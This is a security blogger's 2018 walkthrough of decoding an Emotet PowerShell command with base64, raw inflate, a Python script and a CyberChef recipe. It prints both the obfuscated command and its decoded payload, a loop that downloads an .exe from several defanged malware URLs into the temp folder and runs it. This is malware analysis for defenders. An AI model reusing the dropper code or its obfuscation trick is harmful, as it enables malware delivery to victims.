Tuesday, July 10, 2018

July Emotet Encoded Powershell Observed

I love taking the time to de-obfuscate newly observed scripts, and Emotet gives me plenty of opportunity to do this. As I posted last month, there are a number of ways to decode these, and I could just simply run these through a sandbox, but I like to really understand the obfuscation for my self.  Which is why I take the time to reverse it a little bit, and to share how I go about it.

I will say that since I started using Cyber Chef, it almost feels like cheating in a way. I had a python script that I kept updating to look for signs of known emotet encodings that I've observed and then decode them. I was up to version 8 of my script, I still write this stuff to keep in practice, but I find Cyber Chef to be a much faster method for "writing" a decoder of sorts.

So, the new variant I had observed looks like this:

powershell ( nEW-obJeCt SYSTEM.IO.COMpreSsION.dEFlateStreaM([SYStEm.Io.mEmORyStREam] [SYstEm.coNverT]::frOMbAse64stRIng( 'RVDbagIxEP2VfQhEsZv0oVAwLAi1F6QthUXE0pdJdupGs0nMjm5F/PeuUizM0zlzLjPMfj4XHrs86DUayt6RxAL1g7PoSbHXGRW8JopjKWOyDabowAcR0koutZz8UbDHHDwJExq5u6LNDizVYEV0UlddC/+CdQPNrrUGnFhH2YVUxYRtK7uYm+Cpz5aP5rYsrwIPq3CAxprN4ZJiwNS41S6spJ4uZm/zqeSijM7SgE/4UDHTzrMi4/d3XDGqtgVDvx8TNnHEv/joTI+4wB/k6jsk7N0G7MX6rJ/z0cMjpcOR9c8R09B5F6B6sg4vOzfZ2XCoSoJE+UcKpm9+wZTunTbqZIBMfTydfgE=' ), [IO.comprEsSION.CompREssIONmoDE]::dECoMprEsS ) | fOREACH-OBject{ nEW-obJeCt SySteM.io.StREamreAder($_, [SyStem.tEXt.EncodiNg]::ASCIi ) } | FOReaCH-ObjEcT{ $_.rEADToENd( ) }) |. ( $eNv:CoMspeC[4,24,25]-join'')

The first thing to notice is that there is simple base64 encoding going on here. However, decoding this as-is, looks like this (using base64 -d from command line):

��� �J.���Q�� <0 ne="" s.3="" trw=""> �<�5 �ޑ� ����I�� �&�c)c� ��u ͮ� �XGمTńm+�����ϖ���,� �p�ƚ���b�Ը�.���.fo��䢌�ҀO�P1�γ"��w\1��C� 6qĿ��L��� ��;$�� ��������#�Ñ�� ��y �z�/;7��p�J�D�G �o~����6�d�L}<�~

This isn't very helpful, however, when to look at the next clue,  you can see  that it is compressed and being decompressed.

This isn't new to me, I've observed other similar tactics being used with tools like powersploit, a quick python script I wrote a while back for aforementioned tactics actually works here. Forgive the long winded approach here, I never streamlined this:

echo "base64code" | base64 -d >> evilb64
python powershelldeflate2.py -i evilb64 $iZG=new-object Net.WebClient;$LJt='http://primerplano[.]org/Yb/@http://ave-ant[.]com/u/@http://muaithai[.]pl/bdwsab/@http://jmamusical[.]jp/wordpress/wp-content/Ec0SS/@http://nagoyamicky[.]com/cacheqblog/bDWJMUD/'.Split('@');$csU = '74';$tdq=$env:temp+'\'+$csU+'.exe';foreach($Hin in $LJt){try{$iZG.DownloadFile($Hin, $tdq);Start-Process $tdq;break;}catch{}}

My python script is largely based on information found here.  It attempts to use ZLIB and GZIP for decompressing the file.

Now, the other way I approached this "other than using write-host in powershell" is to use Cyber Chef to see if I could even write a recipe for this variant. Here is that recipe!

Regular_expression('User defined','\\(\\s\\\'[a-zA-Z0-9/+=]*\\\'',true,true,false,false,false,false,'List matches') Find_/_Replace({'option':'Regex','string':'[\\(\\\'\\)]'},'',true,false,true) From_Base64('A-Za-z0-9+/=',true) Raw_Inflate(0,0,'Adaptive',false,false) Split('@','\\n') Regular_expression('User defined','https?[:a-zA-Z0-9/.-]*',true,true,true,true,false,false,'List matches')


As you can see the Cyber Chef output is pretty clean, as always, if anyone has any better RegEx to use here, I always enjoy optimizing these things. I hope everyone finds this useful.